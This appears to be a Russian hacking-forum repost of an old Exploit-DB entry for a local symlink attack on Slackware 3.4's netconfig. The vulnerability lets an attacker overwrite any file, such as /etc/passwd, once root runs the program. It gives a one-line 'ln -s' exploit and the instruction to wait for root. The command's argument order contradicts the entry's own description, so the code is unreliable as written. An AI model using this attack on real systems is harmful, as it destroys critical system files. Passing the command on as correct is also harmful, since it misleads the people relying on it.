Exploit Slackware Linux 3.4 - 'netconfig' Temporary File

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19073
Проверка EDB
  1. Пройдено
Автор
NEONHAZE
Тип уязвимости
LOCAL
Платформа
LINUX
CVE
null
Дата публикации
1998-04-06
Код:
source: https://www.securityfocus.com/bid/81/info

netconfig creates the file /tmp/tmpmsg insecurely and follows symbolic links. An attacker can create a symbolic link from /tmp/tmpmsg to any file and wait for root to run the program. This will clober the target file. The file created has permissions -rw-r--r--.

$ ln -s /tmp/tmpmsg /etc/passwd
< wait for root to run netconfig >
 
Источник
www.exploit-db.com

Похожие темы